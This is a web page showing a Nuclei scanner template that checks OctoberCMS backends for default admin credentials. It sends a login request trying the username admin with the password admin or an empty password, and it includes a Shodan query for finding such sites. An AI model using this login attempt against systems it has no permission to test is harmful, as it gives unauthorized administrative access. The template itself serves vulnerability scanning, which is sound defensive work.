Skip to content

OctoberCMS - Default Admin Discovery

ID: octobercms-default-login

Severity: high

Author: princechaddha

Tags: octobercms,default-login,oss

OctoberCMS default admin credentials were discovered.

id: octobercms-default-login
info:
name: OctoberCMS - Default Admin Discovery
author: princechaddha
severity: high
description: OctoberCMS default admin credentials were discovered.
reference:
- https://github.com/octobercms/october
- https://octobercms.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: http.component:"October CMS"
product: october
vendor: octobercms
tags: octobercms,default-login,oss
http:
- raw:
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
_token={{token}}&postback=1&login={{username}}&password={{password}}
attack: clusterbomb
payloads:
username:
- admin
password:
- admin
- ""
matchers-condition: and
matchers:
- type: word
part: header
words:
- "october_session="
- "admin_auth="
condition: and
- type: status
status:
- 302
extractors:
- type: regex
part: body
name: token
internal: true
group: 1
regex:
- 'meta name="csrf\-token" content="([A-Za-z0-9]+)">'
# digest: 4b0a00483046022100e49efe8bbb3d84602e0a7b7f66f5fc0cec94d6d94147bfd819979fabd645c609022100c2c2114eb296f6b6f41bb43ccba5845bec939077c07c51609f7499f5a80c364c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/octobercms/octobercms-default-login.yaml"

View on Github